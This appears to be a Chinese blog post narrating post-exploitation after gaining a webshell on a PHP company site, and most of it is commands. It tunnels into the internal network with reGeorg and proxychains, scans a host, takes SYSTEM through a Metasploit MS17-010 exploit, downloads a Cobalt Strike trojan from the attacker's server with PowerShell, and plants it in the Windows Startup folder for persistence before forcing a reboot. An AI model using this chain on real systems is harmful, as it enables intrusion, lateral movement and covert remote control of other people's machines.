拿到webshell之后的事情
2024-09-04 08:55:16
之前搞站都是搞到后台管理员,或者搞到webshell就宣布结束了,,今天终于有机会学习一下后面的操作了。
公司网站为php的站,已经拿到webshell。可以进行菜刀连接。
菜刀虚拟终端
php -m #查看php是否有socket库,因为reGeory需要用到sockets库。
如果没有sockets,则上传的tunnel.php需要添加dl("php_sockers.dll")
reGeorg + proxychains 代理内网
reGeorg 本地代理
python reGeorgSocksProxy.py -p 8080 -u http://222.252.10.101:8080/tunnel.php
#将http://222.252.10.101:8080代理到本地的8080端口
然后复制一个终端,proxychains上场。
注意proxychains的配置信息
vi /etc/proxychains.conf
添加
socket5 127.0.0.1 8080 #端口为上面配置的port
因为reGeorg使用的sockets协议,只支持tcp,所以没法ping通。
proxychains nmap -sT -Pn 172.168.10.50
看到445端口,就要想到ms17-010呀,你也可以proxychains命令行调用一下Nessus扫一下哈
利用msf获取system权限
proxychains -q msfconsole
#-q 不显示proxychains的回显信息
#use exploit/windows/smb/ms17_010_psexec
#set rhost 172.168.10.50
#run
#shell
进入命令行
powershell下载并运行远控
可以用cobaltstrike生成对应系统的木马,将该木马放在自己已有的服务器上。
直接用powershell将木马从远程服务器下载到目标服务器中。
>powershell $client = new-object System.Net.WebClient;$client.DownloadFile(‘http://自己已有服务器ip/zz.exe’,'c:\zz.exe')
或者如果菜刀的权限比较高,可以直接将木马传到开机启动的路径下;
C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
#win7的开机启动路径
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
#win10的开机启动路径
#根据服务器windows版本搜索对应的开机启动文件夹的路径
若菜刀权限比较低,可先用菜刀把马传到网站根路径下,再用msf-shell将木马复制到开机启动的路径下。因为有些远控马,必须当前用户启动木马后才有更多的功能,所以,先把远控马传到开机启动的路径下面,再msf使目标机器重启,即可达到目的。。。说的比较啰嗦,但这就是我所理解的,,如果有哪里不对,请您留言告诉我哈。
msf重启目标机器//这一步并不一定得操作。。
shutdown -r -t 0
或 reboot
然后,连远控;;
最新文章
- 四道简单DP
- 如何为编程爱好者设计一款好玩的智能硬件(九)——LCD1602点阵字符型液晶显示模块驱动封装(下)
- struts2 log4j:WARN Please initialize the log4j system properly. 解决方法
- ASP.NET SignalR2持久连接层解析
- TDirectory.GetDirectoryRoot获取指定目录的根目录
- 通过JS判断联网类型和连接状态
- .Net程序猿玩转Android开发---(7)相对布局RelativeLayout
- IIS添加服务
- UNIX环境高级编程——Linux终端设备详解
- Go基础(2)
- 复旦高等代数II(18级)每周一题
- centos7编译安装nginx
- Java集合类源码解析:AbstractMap
- 让自己的网站实现在线编辑office文档
- sqlitestudio
- eclipse开发mapreduce程序时出现的问题
- Ubuntu18.04使用adb和tcpdump对android设备进行网络调试
- Qt编写网络调试助手(TCP客户端+TCP服务端+UDP服务端)终极版开源
- 执行计划--WHERE条件的先后顺序对执行计划的影响
- BZOJ2761 不重复的数字 【treap】